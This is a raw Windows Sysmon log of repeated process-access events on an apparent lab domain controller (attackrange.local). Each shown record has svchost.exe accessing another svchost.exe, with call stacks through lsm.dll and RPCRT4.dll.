13:58:22.227{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010850Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.227{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010849Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.227{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010848Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.227{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010847Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.227{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010846Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.227{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010845Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.227{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010844Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.227{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010843Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.211{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010842Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.211{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010841Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.211{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010840Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.211{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010839Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.211{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010838Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.211{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010837Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.211{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010836Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.211{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010835Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.211{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010834Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.211{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010833Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.211{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010832Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.211{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010831Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.211{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010830Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.211{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010829Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.211{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010828Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.211{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010827Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 